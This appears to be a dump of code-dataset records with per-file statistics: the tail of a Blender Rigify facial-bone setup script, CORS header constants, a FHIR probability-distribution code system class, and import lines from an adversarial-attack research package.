pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.B.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
bpy.ops.object.mode_set(mode='EDIT')
for bone in arm.edit_bones:
bone.select = False
bone.select_head = False
bone.select_tail = False
for b in bones:
bone = arm.edit_bones[bones[b]]
bone.select = True
bone.select_head = True
bone.select_tail = True
arm.edit_bones.active = bone
arm.layers = [(x in [0, 3, 4, 5, 7, 10, 13, 16, 19]) for x in range(32)]
if __name__ == "__main__":
create(bpy.context.active_object)
| 53.398203
| 274
| 0.661395
| 25,457
| 172,316
| 4.379228
| 0.021605
| 0.677419
| 0.893149
| 1.027072
| 0.975252
| 0.948413
| 0.944296
| 0.934384
| 0.92684
| 0.912775
| 0
| 0.062728
| 0.182171
| 172,316
| 3,227
| 275
| 53.398203
| 0.728345
| 0.000226
| 0
| 0.582503
| 1
| 0
| 0.058917
| 0.00195
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000311
| false
| 0.014944
| 0.000623
| 0
| 0.000934
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
beed8e925b74a2a0437df05a80b706640216d067
| 830
|
py
|
Python
|
constants.py
|
omidmogharian/aserver
|
88dc96e2c5ddfda180d7215733e0120279273280
|
[
"MIT"
] | null | null | null |
constants.py
|
omidmogharian/aserver
|
88dc96e2c5ddfda180d7215733e0120279273280
|
[
"MIT"
] | null | null | null |
constants.py
|
omidmogharian/aserver
|
88dc96e2c5ddfda180d7215733e0120279273280
|
[
"MIT"
] | null | null | null |
Basic_HEADER = {'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'POST, GET, OPTIONS',
'Access-Control-Allow-Headers':
'access_token, accessToken,origin,'
' x-csrftoken, content-type, accept',
'Access-Control-Max-Age': '1728000'}
FILE_UPLOAD_HEADER = {'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'POST',
'Access-Control-Allow-Headers': (
'access_token, '
'accessToken, '
'origin, '
'x-csrftoken, '
'content-type, '
'accept'
),
'Access-Control-Max-Age': '1728000'}
| 43.684211
| 69
| 0.433735
| 61
| 830
| 5.819672
| 0.377049
| 0.292958
| 0.304225
| 0.135211
| 0.929577
| 0.929577
| 0.929577
| 0.929577
| 0.929577
| 0.929577
| 0
| 0.029915
| 0.436145
| 830
| 18
| 70
| 46.111111
| 0.728632
| 0
| 0
| 0.117647
| 0
| 0
| 0.461446
| 0.253012
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
835d0cafdadecdf6cd2d88be712d837d53cc5e7f
| 8,604
|
py
|
Python
|
oops_fhir/r4/code_system/v3_probability_distribution_type.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
oops_fhir/r4/code_system/v3_probability_distribution_type.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
oops_fhir/r4/code_system/v3_probability_distribution_type.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["v3ProbabilityDistributionType"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class v3ProbabilityDistributionType:
"""
v3 Code System ProbabilityDistributionType
**** MISSING DEFINITIONS ****
Status: active - Version: 2018-08-12
Copyright None
http://terminology.hl7.org/CodeSystem/v3-ProbabilityDistributionType
"""
b = CodeSystemConcept(
{
"code": "B",
"definition": "The beta-distribution is used for data that is bounded on both sides and may or may not be skewed (e.g., occurs when probabilities are estimated.) Two parameters a and b are available to adjust the curve. The mean m and variance s2 relate as follows: m = a/ (a + b) and s2 = ab/((a + b)2 (a + b + 1)).",
"display": "beta",
}
)
"""
beta
The beta-distribution is used for data that is bounded on both sides and may or may not be skewed (e.g., occurs when probabilities are estimated.) Two parameters a and b are available to adjust the curve. The mean m and variance s2 relate as follows: m = a/ (a + b) and s2 = ab/((a + b)2 (a + b + 1)).
"""
e = CodeSystemConcept(
{
"code": "E",
"definition": "Used for data that describes extinction. The exponential distribution is a special form of g-distribution where a = 1, hence, the relationship to mean m and variance s2 are m = b and s2 = b2.",
"display": "exponential",
}
)
"""
exponential
Used for data that describes extinction. The exponential distribution is a special form of g-distribution where a = 1, hence, the relationship to mean m and variance s2 are m = b and s2 = b2.
"""
f = CodeSystemConcept(
{
"code": "F",
"definition": "Used to describe the quotient of two c2 random variables. The F-distribution has two parameters n1 and n2, which are the numbers of degrees of freedom of the numerator and denominator variable respectively. The relationship to mean m and variance s2 are: m = n2 / (n2 - 2) and s2 = (2 n2 (n2 + n1 - 2)) / (n1 (n2 - 2)2 (n2 - 4)).",
"display": "F",
}
)
"""
F
Used to describe the quotient of two c2 random variables. The F-distribution has two parameters n1 and n2, which are the numbers of degrees of freedom of the numerator and denominator variable respectively. The relationship to mean m and variance s2 are: m = n2 / (n2 - 2) and s2 = (2 n2 (n2 + n1 - 2)) / (n1 (n2 - 2)2 (n2 - 4)).
"""
g = CodeSystemConcept(
{
"code": "G",
"definition": "The gamma-distribution used for data that is skewed and bounded to the right, i.e. where the maximum of the distribution curve is located near the origin. The g-distribution has a two parameters a and b. The relationship to mean m and variance s2 is m = a b and s2 = a b2.",
"display": "(gamma)",
}
)
"""
(gamma)
The gamma-distribution used for data that is skewed and bounded to the right, i.e. where the maximum of the distribution curve is located near the origin. The g-distribution has a two parameters a and b. The relationship to mean m and variance s2 is m = a b and s2 = a b2.
"""
ln = CodeSystemConcept(
{
"code": "LN",
"definition": "The logarithmic normal distribution is used to transform skewed random variable X into a normally distributed random variable U = log X. The log-normal distribution can be specified with the properties mean m and standard deviation s. Note however that mean m and standard deviation s are the parameters of the raw value distribution, not the transformed parameters of the lognormal distribution that are conventionally referred to by the same letters. Those log-normal parameters mlog and slog relate to the mean m and standard deviation s of the data value through slog2 = log (s2/m2 + 1) and mlog = log m - slog2/2.",
"display": "log-normal",
}
)
"""
log-normal
The logarithmic normal distribution is used to transform skewed random variable X into a normally distributed random variable U = log X. The log-normal distribution can be specified with the properties mean m and standard deviation s. Note however that mean m and standard deviation s are the parameters of the raw value distribution, not the transformed parameters of the lognormal distribution that are conventionally referred to by the same letters. Those log-normal parameters mlog and slog relate to the mean m and standard deviation s of the data value through slog2 = log (s2/m2 + 1) and mlog = log m - slog2/2.
"""
n = CodeSystemConcept(
{
"code": "N",
"definition": 'This is the well-known bell-shaped normal distribution. Because of the central limit theorem, the normal distribution is the distribution of choice for an unbounded random variable that is an outcome of a combination of many stochastic processes. Even for values bounded on a single side (i.e. greater than 0) the normal distribution may be accurate enough if the mean is "far away" from the bound of the scale measured in terms of standard deviations.',
"display": "normal (Gaussian)",
}
)
"""
normal (Gaussian)
This is the well-known bell-shaped normal distribution. Because of the central limit theorem, the normal distribution is the distribution of choice for an unbounded random variable that is an outcome of a combination of many stochastic processes. Even for values bounded on a single side (i.e. greater than 0) the normal distribution may be accurate enough if the mean is "far away" from the bound of the scale measured in terms of standard deviations.
"""
t = CodeSystemConcept(
{
"code": "T",
"definition": "Used to describe the quotient of a normal random variable and the square root of a c2 random variable. The t-distribution has one parameter n, the number of degrees of freedom. The relationship to mean m and variance s2 are: m = 0 and s2 = n / (n - 2)",
"display": "T",
}
)
"""
T
Used to describe the quotient of a normal random variable and the square root of a c2 random variable. The t-distribution has one parameter n, the number of degrees of freedom. The relationship to mean m and variance s2 are: m = 0 and s2 = n / (n - 2)
"""
u = CodeSystemConcept(
{
"code": "U",
"definition": "The uniform distribution assigns a constant probability over the entire interval of possible outcomes, while all outcomes outside this interval are assumed to have zero probability. The width of this interval is 2s sqrt(3). Thus, the uniform distribution assigns the probability densities f(x) = sqrt(2 s sqrt(3)) to values m - s sqrt(3) >= x <= m + s sqrt(3) and f(x) = 0 otherwise.",
"display": "uniform",
}
)
"""
uniform
The uniform distribution assigns a constant probability over the entire interval of possible outcomes, while all outcomes outside this interval are assumed to have zero probability. The width of this interval is 2s sqrt(3). Thus, the uniform distribution assigns the probability densities f(x) = sqrt(2 s sqrt(3)) to values m - s sqrt(3) >= x <= m + s sqrt(3) and f(x) = 0 otherwise.
"""
x2 = CodeSystemConcept(
{
"code": "X2",
"definition": "Used to describe the sum of squares of random variables which occurs when a variance is estimated (rather than presumed) from the sample. The only parameter of the c2-distribution is n, so called the number of degrees of freedom (which is the number of independent parts in the sum). The c2-distribution is a special type of g-distribution with parameter a = n /2 and b = 2. Hence, m = n and s2 = 2 n.",
"display": "chi square",
}
)
"""
chi square
Used to describe the sum of squares of random variables which occurs when a variance is estimated (rather than presumed) from the sample. The only parameter of the c2-distribution is n, so called the number of degrees of freedom (which is the number of independent parts in the sum). The c2-distribution is a special type of g-distribution with parameter a = n /2 and b = 2. Hence, m = n and s2 = 2 n.
"""
class Meta:
resource = _resource
| 59.337931
| 649
| 0.677359
| 1,286
| 8,604
| 4.521773
| 0.177294
| 0.013758
| 0.022012
| 0.027515
| 0.852623
| 0.850903
| 0.850903
| 0.847463
| 0.847463
| 0.847463
| 0
| 0.019353
| 0.249303
| 8,604
| 144
| 650
| 59.75
| 0.880941
| 0.022896
| 0
| 0
| 0
| 0.126761
| 0.720041
| 0.00593
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042254
| 0
| 0.197183
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
835dc089927fa81f4bc85ce7b3430f8fd20dba49
| 225
|
py
|
Python
|
policy_driven_attack/policy/mnist/__init__.py
|
machanic/TangentAttack
|
17c1a8e93f9bbd03e209e8650631af744a0ff6b8
|
[
"Apache-2.0"
] | 4
|
2021-11-12T04:06:32.000Z
|
2022-01-27T09:01:41.000Z
|
policy_driven_attack/policy/mnist/__init__.py
|
machanic/TangentAttack
|
17c1a8e93f9bbd03e209e8650631af744a0ff6b8
|
[
"Apache-2.0"
] | 1
|
2022-02-22T14:00:59.000Z
|
2022-02-25T08:57:29.000Z
|
policy_driven_attack/policy/mnist/__init__.py
|
machanic/TangentAttack
|
17c1a8e93f9bbd03e209e8650631af744a0ff6b8
|
[
"Apache-2.0"
] | null | null | null |
from policy_driven_attack.policy.mnist.empty import *
from policy_driven_attack.policy.mnist.unet import *
from policy_driven_attack.policy.mnist.carlinet_inv import *
from policy_driven_attack.policy.mnist.vgg_inv import *
| 37.5
| 60
| 0.853333
| 34
| 225
| 5.352941
| 0.323529
| 0.21978
| 0.351648
| 0.483516
| 0.824176
| 0.824176
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0.075556
| 225
| 5
| 61
| 45
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.